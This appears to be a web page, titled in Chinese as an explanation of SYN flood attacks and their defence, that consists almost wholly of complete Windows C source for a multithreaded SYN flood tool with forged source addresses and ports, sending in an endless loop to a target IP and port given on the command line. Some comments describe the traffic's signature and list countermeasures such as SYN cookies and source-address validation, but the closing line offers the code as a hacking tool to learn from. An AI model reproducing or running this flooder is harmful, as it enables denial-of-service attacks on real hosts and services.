
SYN flood网络攻击的原理及其防御方法

  1. &#35;include <winsock2.h>
  2. &#35;include <Ws2tcpip.h>
  3. &#35;include <stdio.h>
  4. &#35;pragma comment(lib,"ws2_32.lib")
  5. &#35;define SEQ 0x28376839
  /* File-scope state shared by main() and every worker thread:
   *   threadnum - number of worker threads started so far
   *   maxthread - thread count requested on the command line
   *   port      - destination TCP port taken from the command line */
  int threadnum,maxthread,port;
  char *DestIP;// destination IP address string (assigned from argv[1] in main)
  /*
   * Print a one-line status indicator: a spinner frame followed by the current
   * value of the global threadnum. The trailing '\r' moves the cursor back to
   * the start of the line so that the next call overwrites this one.
   */
  void display(void)
  {
      /* Four spinner frames; play runs 0..11, i.e. three passes over them. */
      static const char *const frames[4] = { " | ", " / ", " - ", " \\ " };
      static int play = 0;   /* position in the 12-step cycle, kept across calls */

      printf("=%s= %d threads \r", frames[play % 4], threadnum);

      if (play == 11) {
          play = 0;
      } else {
          play = play + 1;
      }
  }
  // TCP header without options, laid out field by field.
  // It is 20 bytes when USHORT is 16 bits and unsigned int is 32 bits.
  typedef struct tcphdr
  {
      USHORT th_sport;// 16-bit source port
      USHORT th_dport;// 16-bit destination port
      unsigned int th_seq;// 32-bit sequence number
      unsigned int th_ack;// 32-bit acknowledgement number
      unsigned char th_lenres;// 4-bit header length (in 32-bit words) + 4 of the 6 reserved bits
      unsigned char th_flag;// 6 flag bits (SYN is 0x02); the top two bits are the remaining reserved bits
      USHORT th_win;// 16-bit window size
      USHORT th_sum;// 16-bit checksum
      USHORT th_urp;// 16-bit urgent pointer
  }TCP_HEADER;
  // IPv4 header without options, laid out field by field.
  typedef struct iphdr// IP header
  {
      unsigned char h_verlen;// 4-bit IP version (high nibble) and 4-bit header length in 32-bit words (low nibble)
      unsigned char tos;// 8-bit type of service
      unsigned short total_len;// 16-bit total length
      unsigned short ident;// 16-bit identification
      unsigned short frag_and_flags;// 3-bit IP flags (reserved, DF, MF) + 13-bit fragment offset; unrelated to TCP flags such as SYN/ACK
      unsigned char ttl;// 8-bit time to live
      unsigned char proto;// 8-bit protocol number
      unsigned short checksum;// 16-bit IP header checksum
      unsigned int sourceIP;// 32-bit source address (this program writes a forged value here)
      unsigned int destIP;// 32-bit destination address (the targeted host)
  }IP_HEADER;
  // TCP pseudo-header: placed in front of the TCP header only while the TCP
  // checksum is computed, so that the checksum also covers the addresses.
  // This declares one file-scope object named PSD_HEADER of an unnamed struct
  // type; it is not a typedef.
  // NOTE(review): the 12-byte pseudo-header layout assumes unsigned long is
  // 32 bits (as with MSVC) - confirm for the target compiler.
  struct
  {
      unsigned long saddr;// source address
      unsigned long daddr;// destination address
      char mbz;// must be zero
      char ptcl;// protocol number
      unsigned short tcpl;// TCP length
  }PSD_HEADER;
  /*
   * Internet checksum: add the buffer up as 16-bit words, fold the carries
   * back into the low 16 bits and return the one's complement of the result.
   * When used on an IP header, the header's own checksum field must be set
   * to 0 before the call.
   *
   * buffer   start of the data, read as USHORT words
   * size     length of the data in bytes; a trailing odd byte is added as-is
   * returns  the 16-bit one's-complement checksum
   */
  USHORT checksum(USHORT *buffer, int size)
  {
      unsigned long sum = 0;

      for (; size > 1; size -= sizeof(USHORT)) {
          sum += *buffer++;
      }
      if (size != 0) {
          sum += *(UCHAR *)buffer;
      }

      /* Fold twice: the first fold can itself produce a carry. */
      sum = (sum & 0xffff) + (sum >> 16);
      sum += sum >> 16;
      return (USHORT)~sum;
  }
  /*
   * Worker thread: builds a TCP SYN segment behind a hand-written IP header and
   * sends it over a raw socket in an endless loop, changing the source address,
   * source port and sequence number on every iteration. lp is not used.
   *
   * What the traffic looks like on the wire (for detection), per the constants below:
   *   - SYN flag only (th_flag = 2), no TCP options (header length 5 words),
   *     window 16384, TTL 128;
   *   - the IP identification field is the same in every packet;
   *   - one counter (1..65536) drives three fields together: source address =
   *     destination address + counter, source port = low 16 bits of the counter,
   *     sequence number = SEQ + counter.
   * The forged sources never complete the handshake, so the listener is left
   * with half-open connections. Usual countermeasures: SYN cookies, SYN rate
   * limiting, shorter SYN-RECEIVED timeouts, and source-address validation
   * (BCP 38) at the network edge.
   * NOTE(review): desktop Windows releases are documented to refuse TCP sends
   * over raw sockets - confirm against the Winsock raw-socket documentation
   * for the OS in question.
   */
  DWORD WINAPI SynfloodThread(LPVOID lp)// thread entry point
  {
      SOCKET sock =NULL;
      int ErrorCode=0,flag=true,TimeOut=2000,FakeIpNet,FakeIpHost,dataSize=0,SendSEQ=0;
      struct sockaddr_in sockAddr;
      TCP_HEADER tcpheader;
      IP_HEADER ipheader;
      char sendBuf[128];
      sock=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED);
      if(sock==INVALID_SOCKET)
      {
          printf("Socket failed: %d\n",WSAGetLastError());
          return 0;
      }
      // set IP_HDRINCL so that the IP header is supplied by this code
      ErrorCode=setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(int));
      if(ErrorCode==SOCKET_ERROR)
      {
          printf("Set sockopt failed: %d\n",WSAGetLastError());
          return 0;
      }
      // set the send timeout (TimeOut = 2000)
      ErrorCode=setsockopt(sock,SOL_SOCKET,SO_SNDTIMEO,(char*)&TimeOut,sizeof(TimeOut));
      if(ErrorCode==SOCKET_ERROR)
      {
          printf("Set sockopt time out failed: %d\n",WSAGetLastError());
          return 0;
      }
      // set the destination address
      memset(&sockAddr,0,sizeof(sockAddr));
      sockAddr.sin_family=AF_INET;
      sockAddr.sin_addr.s_addr =inet_addr(DestIP);
      // the forged source addresses are derived from the destination address itself
      FakeIpNet=inet_addr(DestIP);
      FakeIpHost=ntohl(FakeIpNet);
      // fill in the IP header
      ipheader.h_verlen=(4<<4 | sizeof(IP_HEADER)/sizeof(unsigned long));
      ipheader.total_len = htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER));
      ipheader.ident = 1;// assigned without byte-order conversion; never changed afterwards
      ipheader.frag_and_flags = 0;
      ipheader.ttl = 128;
      ipheader.proto = IPPROTO_TCP;
      ipheader.checksum =0;
      ipheader.sourceIP = htonl(FakeIpHost+SendSEQ);
      ipheader.destIP = inet_addr(DestIP);
      // fill in the TCP header
      tcpheader.th_dport=htons(port);
      tcpheader.th_sport = htons(8080);
      tcpheader.th_seq = htonl(SEQ+SendSEQ);
      tcpheader.th_ack = 0;
      tcpheader.th_lenres =(sizeof(TCP_HEADER)/4<<4|0);
      tcpheader.th_flag = 2;// SYN only
      tcpheader.th_win = htons(16384);
      tcpheader.th_urp = 0;
      tcpheader.th_sum = 0;
      // fill in the pseudo-header used for the TCP checksum
      PSD_HEADER.saddr=ipheader.sourceIP;
      PSD_HEADER.daddr=ipheader.destIP;
      PSD_HEADER.mbz=0;
      PSD_HEADER.ptcl=IPPROTO_TCP;
      PSD_HEADER.tcpl=htons(sizeof(tcpheader));
      for(;;)
      {
          // advance the counter; source address, sequence number and source port all follow it
          SendSEQ=(SendSEQ==65536)?1:SendSEQ+1;
          ipheader.checksum =0;
          ipheader.sourceIP = htonl(FakeIpHost+SendSEQ);
          tcpheader.th_seq = htonl(SEQ+SendSEQ);
          tcpheader.th_sport = htons(SendSEQ);
          tcpheader.th_sum = 0;
          PSD_HEADER.saddr=ipheader.sourceIP;
          // copy the pseudo-header and the TCP header into one buffer and compute the TCP checksum
          memcpy(sendBuf,&PSD_HEADER,sizeof(PSD_HEADER));
          memcpy(sendBuf+sizeof(PSD_HEADER),&tcpheader,sizeof(tcpheader));
          tcpheader.th_sum=checksum((USHORT *)sendBuf,sizeof(PSD_HEADER)+sizeof(tcpheader));
          // overwrite the buffer with the real IP header + TCP header and compute the IP checksum
          memcpy(sendBuf,&ipheader,sizeof(ipheader));
          memcpy(sendBuf+sizeof(ipheader),&tcpheader,sizeof(tcpheader));
          memset(sendBuf+sizeof(ipheader)+sizeof(tcpheader),0,4);
          dataSize=sizeof(ipheader)+sizeof(tcpheader);
          ipheader.checksum=checksum((USHORT *)sendBuf,dataSize);
          memcpy(sendBuf,&ipheader,sizeof(ipheader));
          sendto(sock,sendBuf,dataSize,0,(struct sockaddr*) &sockAddr,sizeof(sockAddr));
          display();
      }//end for
      // the for(;;) above contains no break, so the statements below are not reached
      Sleep(20);
      InterlockedExchangeAdd((long *)&threadnum,-1);
      return 0;
  }
  /* Print the banner and the command-line synopsis, with name substituted
   * into the usage and example lines. */
  void usage(char *name)
  {
      fputs("\t===================SYN Flood======================\n", stdout);
      fputs("\t==========gxisone@hotmail.com 2004/7/6========\n", stdout);
      printf("\tusage: %s [dest_IP] [port] [thread]\n", name);
      printf("\tExample: %s 192.168.1.1 80 100\n", name);
  }
  /*
   * Entry point. Expects exactly three arguments: destination IP, port and
   * thread count. Stores them in the file-scope variables, initialises
   * Winsock 2.2, starts SynfloodThread workers until threadnum reaches
   * maxthread, then calls WSACleanup() and returns 0.
   */
  int main(int argc,char* argv[])
  {
      if(argc!=4)
      {
          usage(argv[0]);
          return 0;
      }
      usage(argv[1]);// prints the banner again, with argv[1] in place of the program name
      int ErrorCode=0;
      DestIP=argv[1];// destination host IP
      port=atoi(argv[2]);// destination port
      maxthread=(maxthread>100)?100:atoi(argv[3]);
      // NOTE(review): the condition reads maxthread before it is assigned (file-scope, hence 0),
      // so the result is always atoi(argv[3]); no upper bound of 100 is applied here.
      WSADATA wsaData;
      if((ErrorCode=WSAStartup(MAKEWORD(2,2),&wsaData))!=0){
          printf("WSAStartup failed: %d\n",ErrorCode);
          return 0;
      }
      printf("[start]...........\nPress any key to stop!\n");
      while(threadnum<maxthread)// thread-creation loop
      {
          if(CreateThread(NULL,0,SynfloodThread,0,0,0))
          {
              Sleep(10);
              threadnum++;
          }
      }
      WSACleanup();
      printf("\n[Stopd]...........\n");
      return 0;
  }
一个SYN flood 工具源代码~~可以学习一下如何编写黑客工具
